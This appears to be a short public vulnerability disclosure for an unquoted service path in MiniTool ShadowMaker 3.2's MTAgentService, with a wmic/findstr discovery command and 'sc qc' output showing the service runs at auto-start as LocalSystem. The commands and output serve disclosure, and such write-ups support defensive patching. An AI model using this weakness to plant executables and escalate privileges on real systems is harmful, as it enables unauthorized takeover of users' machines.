# Exploit Title: MiniTool ShadowMaker 3.2 - 'MTAgentService' Unquoted Service Path # Discovery by: Thalia Nieto # Discovery Date: 02/01/21 # Vendor Homepage: https://www.minitool.com # Software Link: https://www.minitool.com/backup/thanks-download.html?v=sm-free&r=download-center/ # Tested Version: 3.2 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, name | findstr /i "MTAgentService" MTAgentService MTAgentService C:\Program Files\MiniTool ShadowMaker\AgentService.exe # Service info: C:\>sc qc "MTAgentService" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: MTAgentService TIPO : 110 WIN32_OWN_PROCESS (interactive) TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\MiniTool ShadowMaker\AgentService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : MTAgentService DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem